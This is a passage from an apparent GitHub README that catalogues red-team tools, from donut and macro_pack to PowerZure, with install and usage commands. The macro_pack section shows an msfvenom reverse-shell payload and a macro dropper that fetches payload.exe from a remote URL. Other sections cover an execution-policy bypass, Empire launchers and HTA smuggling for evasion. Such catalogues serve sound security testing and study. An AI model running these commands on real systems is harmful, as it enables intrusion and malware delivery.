donut-shellcode</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Creating shellcode from an XSL file that pops up a calculator. shellcode = donut.create(file=r"C:\\Tools\\Source\\Repos\\donut\\calc.xsl") # Creating shellcode from an unmanaged DLL. Invokes DLLMain. shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")"><pre><span class="pl-c"><span class="pl-c">#</span> Creating shellcode from an XSL file that pops up a calculator.</span> shellcode = donut.create(file=r<span class="pl-s"><span class="pl-pds">"</span>C:<span class="pl-cce">\\</span>Tools<span class="pl-cce">\\</span>Source<span class="pl-cce">\\</span>Repos<span class="pl-cce">\\</span>donut<span class="pl-cce">\\</span>calc.xsl<span class="pl-pds">"</span></span>) <span class="pl-c"><span class="pl-c">#</span> Creating shellcode from an unmanaged DLL. Invokes DLLMain.</span> shellcode = donut.create(file=r<span class="pl-s"><span class="pl-pds">"</span>C:\Tools\Source\Repos\donut\payload\test\hello.dll<span class="pl-pds">"</span></span>)</pre></div> <p dir="auto">For full usage information, see the donut <a href="https://github.com/TheWover/donut/#4-usage">GitHub Page</a>.</p> <p dir="auto">See <a href="https://thewover.github.io/Bear-Claw/" rel="nofollow">a recent blog post</a> from The Wover for more info.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png"><img src="https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/sevagas/macro_pack">Macro_pack</a></h3><a id="user-content-macro_pack" class="anchor" aria-label="Permalink: 🔙Macro_pack" href="#macro_pack"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.</p> <p dir="auto"><strong>Install: (Binary)</strong></p> <ol dir="auto"> <li>Get the latest binary from <a href="https://github.com/sevagas/macro_pack/releases/">https://github.com/sevagas/macro_pack/releases/</a></li> <li>Download binary on PC with genuine Microsoft Office installed.</li> <li>Open console, CD to binary dir and call the binary</li> </ol> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/sevagas/macro_pack.git cd macro_pack pip3 install -r requirements.txt"><pre>git clone https://github.com/sevagas/macro_pack.git <span class="pl-c1">cd</span> macro_pack pip3 install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Help Page python3 macro_pack.py --help # List all supported file formats macro_pack.exe --listformats # Obfuscate the vba file generated by msfvenom and puts result in a new VBA file. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba # Obfuscate Empire stager VBA file and generate a MS Word document: macro_pack.exe -f empire.vba -o -G myDoc.docm # Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe) echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" # Execute calc.exe via Dynamic Data Exchange (DDE) attack echo calc.exe | macro_pack.exe --dde -G calc.xslx"><pre><span class="pl-c"><span class="pl-c">#</span> Help Page</span> python3 macro_pack.py --help <span class="pl-c"><span class="pl-c">#</span> List all supported file formats</span> macro_pack.exe --listformats <span class="pl-c"><span class="pl-c">#</span> Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.</span> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba <span class="pl-k">|</span> macro_pack.exe -o -G meterobf.vba <span class="pl-c"><span class="pl-c">#</span> Obfuscate Empire stager VBA file and generate a MS Word document:</span> macro_pack.exe -f empire.vba -o -G myDoc.docm <span class="pl-c"><span class="pl-c">#</span> Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">"</span>https://myurl.url/payload.exe<span class="pl-pds">"</span></span> <span class="pl-s"><span class="pl-pds">"</span>dropped.exe<span class="pl-pds">"</span></span> <span class="pl-k">|</span> macro_pack.exe -o -t DROPPER -G <span class="pl-s"><span class="pl-pds">"</span>drop.xlsm<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Execute calc.exe via Dynamic Data Exchange (DDE) attack</span> <span class="pl-c1">echo</span> calc.exe <span class="pl-k">|</span> macro_pack.exe --dde -G calc.xslx</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png"><img src="https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/PowerShellMafia/PowerSploit">PowerSploit</a></h3><a id="user-content-powersploit" class="anchor" aria-label="Permalink: 🔙PowerSploit" href="#powersploit"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.</p> <p dir="auto">Some of the features of PowerSploit:</p> <ul dir="auto"> <li>Dump password hashes and extract clear-text passwords from memory</li> <li>Escalate privileges and bypass security controls</li> <li>Execute arbitrary PowerShell code and bypass execution restrictions</li> <li>Perform network reconnaissance and discovery</li> <li>Generate payloads and execute exploits</li> </ul> <p dir="auto"><strong>Install:</strong> <em>1. Save to PowerShell modules folder</em></p> <p dir="auto">First you will need to download the <a href="https://github.com/PowerShellMafia/PowerSploit">PowerSploit Folder</a> and save it to your PowerShell modules folder.</p> <p dir="auto">Your PowerShell modules folder path can be found with the following command:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$Env:PSModulePath"><pre class="notranslate"><code>$Env:PSModulePath </code></pre></div> <p dir="auto"><strong>Install:</strong> <em>2. Install PowerSploit as a PowerShell module</em></p> <p dir="auto">You will then need to install the PowerSploit module (use the name of the downloaded folder).</p> <p dir="auto"><strong>Note:</strong> <em>Your PowerShell execution policy might block you, to fix this run the following command.</em></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="powershell.exe -ep bypass"><pre class="notranslate"><code>powershell.exe -ep bypass </code></pre></div> <p dir="auto">Now you can install the PowerSploit module.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Import-Module PowerSploit"><pre class="notranslate"><code>Import-Module PowerSploit </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Get-Command -Module PowerSploit"><pre class="notranslate"><code>Get-Command -Module PowerSploit </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png"><img src="https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/GhostPack/Rubeus">Rubeus</a></h3><a id="user-content-rubeus" class="anchor" aria-label="Permalink: 🔙Rubeus" href="#rubeus"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties.</p> <p dir="auto">Some of the features of Rubeus:</p> <ul dir="auto"> <li>Kerberoasting</li> <li>Golden ticket attacks</li> <li>Silver ticket attacks</li> </ul> <p dir="auto"><strong>Install: (Download)</strong></p> <p dir="auto">You can install the unofficial pre-compiled Rubeus binary <a href="https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe">here</a>.</p> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">Rubeus is compatible with <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a>. Open the rubeus <a href="https://github.com/GhostPack/Rubeus">project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Rubeus.exe -h"><pre class="notranslate"><code>Rubeus.exe -h </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png"><img src="https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/GhostPack/SharpUp">SharpUp</a></h3><a id="user-content-sharpup" class="anchor" aria-label="Permalink: 🔙SharpUp" href="#sharpup"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc.</p> <p dir="auto"><strong>Install: (Download)</strong></p> <p dir="auto">You can install the unofficial pre-compiled SharpUp binary <a href="https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe">here</a>.</p> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">SharpUp is compatible with <a href="https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409" rel="nofollow">Visual Studio 2015 Community Edition</a>. Open the SharpUp <a href="https://github.com/GhostPack/SharpUp">project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership. SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable. SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership."><pre>SharpUp.exe audit <span class="pl-c"><span class="pl-c">#</span>-> Runs all vulnerability checks regardless of integrity level or group membership.</span> SharpUp.exe HijackablePaths <span class="pl-c"><span class="pl-c">#</span>-> Check only if there are modifiable paths in the user's %PATH% variable.</span> SharpUp.exe audit HijackablePaths <span class="pl-c"><span class="pl-c">#</span>-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png"><img src="https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/skahwah/SQLRecon">SQLRecon</a></h3><a id="user-content-sqlrecon" class="anchor" aria-label="Permalink: 🔙SQLRecon" href="#sqlrecon"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">MS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft.</p> <p dir="auto">This C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. For detailed usage information on each technique, refer to the <a href="https://github.com/skahwah/SQLRecon/wiki">wiki</a>.</p> <p dir="auto"><strong>Install: (Binary)</strong></p> <p dir="auto">You can download the latest binary release from <a href="https://github.com/skahwah/SQLRecon/releases">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Authenticating using Windows credentials SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # Authenticating using Local credentials SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami # Authenticating using Azure AD credentials SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami # Run whoami SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # View databases SQLRecon.exe -a Windows -s SQL01 -d master -m databases # View tables SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019"><pre><span class="pl-c"><span class="pl-c">#</span> Authenticating using Windows credentials</span> SQLRecon.exe -a Windows -s SQL01 -d master -m whoami <span class="pl-c"><span class="pl-c">#</span> Authenticating using Local credentials</span> SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami <span class="pl-c"><span class="pl-c">#</span> Authenticating using Azure AD credentials</span> SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami <span class="pl-c"><span class="pl-c">#</span> Run whoami</span> SQLRecon.exe -a Windows -s SQL01 -d master -m whoami <span class="pl-c"><span class="pl-c">#</span> View databases</span> SQLRecon.exe -a Windows -s SQL01 -d master -m databases <span class="pl-c"><span class="pl-c">#</span> View tables</span> SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019</pre></div> <p dir="auto">Full usage information can be found on the <a href="https://github.com/skahwah/SQLRecon/wiki">wiki</a>.</p> <p dir="auto">Tool module usage information can be found <a href="https://github.com/skahwah/SQLRecon#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png"><img src="https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from SQLRecon help page</em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/api0cradle/UltimateAppLockerByPassList">UltimateAppLockerByPassList</a></h3><a id="user-content-ultimateapplockerbypasslist" class="anchor" aria-label="Permalink: 🔙UltimateAppLockerByPassList" href="#ultimateapplockerbypasslist"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This resrouce is a collection of the most common and known techniques to bypass AppLocker.</p> <p dir="auto">Since AppLocker can be configured in different ways <a href="https://github.com/api0cradle">@api0cradle</a> maintains a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone.</p> <p dir="auto">They also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs.</p> <p dir="auto">Indexed Lists</p> <ul dir="auto"> <li><a href="https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md">Generic-AppLockerbypasses.md</a></li> <li><a href="https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md">VerifiedAppLockerBypasses.md</a></li> <li><a href="https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md">UnverifiedAppLockerBypasses.md</a></li> <li><a href="https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md">DLL-Execution.md</a></li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png"><img src="https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/api0cradle/UltimateAppLockerByPassList">https://github.com/api0cradle/UltimateAppLockerByPassList</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Cn33liz/StarFighters">StarFighters</a></h3><a id="user-content-starfighters" class="anchor" aria-label="Permalink: 🔙StarFighters" href="#starfighters"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.</p> <p dir="auto">Both Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe.</p> <p dir="auto">This might be usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files.</p> <p dir="auto"><strong>Usage:</strong></p> <ul dir="auto"> <li>Setup a new Listener within PowerShell Empire</li> <li>Use the Launcher command to Generate a PowerShell launcher for this listener</li> <li>Copy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file</li> </ul> <p dir="auto">For the JavaScript version use the following Variable:</p> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=" var EncodedPayload = "<Paste Encoded Launcher Payload Here>""><pre> <span class="pl-k">var</span> <span class="pl-v">EncodedPayload</span> <span class="pl-c1">=</span> <span class="pl-s">"<Paste Encoded Launcher Payload Here>"</span></pre></div> <p dir="auto">For the VBScript version use the following Variable:</p> <div class="highlight highlight-source-vbnet notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=" Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>""><pre> <span class="pl-k">Dim</span> <span class="pl-smi">EncodedPayload:</span> <span class="pl-smi">EncodedPayload</span> <span class="pl-smi">=</span> <span class="pl-s">"<Paste Encoded Launcher Payload Here>"</span></pre></div> <ul dir="auto"> <li>Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.</li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png"><img src="https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html" rel="nofollow">https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/nccgroup/demiguise">demiguise</a></h3><a id="user-content-demiguise" class="anchor" aria-label="Permalink: 🔙demiguise" href="#demiguise"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">The aim of this project is to generate .html files that contain an encrypted HTA file.</p> <p dir="auto">The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user.</p> <p dir="auto">This is an evasion technique to get round content / file-type inspection implemented by some security-appliances.</p> <p dir="auto">Further technical information <a href="https://github.com/nccgroup/demiguise#how-does-it-do-it">here</a>.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/nccgroup/demiguise cd demiguise"><pre class="notranslate"><code>git clone https://github.com/nccgroup/demiguise cd demiguise </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Generate an encrypted .hta file that executes notepad.exe python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta"><pre><span class="pl-c"><span class="pl-c">#</span> Generate an encrypted .hta file that executes notepad.exe</span> python demiguise.py -k hello -c <span class="pl-s"><span class="pl-pds">"</span>notepad.exe<span class="pl-pds">"</span></span> -p Outlook.Application -o test.hta</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png"><img src="https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/nccgroup/demiguise">https://github.com/nccgroup/demiguise</a></em></p> <div class="markdown-heading" dir="auto"><h2 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/hausec/PowerZure">PowerZure</a></h2><a id="user-content-powerzure" class="anchor" aria-label="Permalink: 🔙PowerZure" href="#powerzure"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.</p> <p dir="auto">There is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure, meaning you can safely use PowerZure to interact with a victim’s cloud instance from your operating machine.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1"><pre>Install-Module -Name Az git clone https://github.com/hausec/PowerZure <span class="pl-c1">cd</span> PowerZure ipmo C:<span class="pl-cce">\p</span>ath<span class="pl-cce">\t</span>o<span 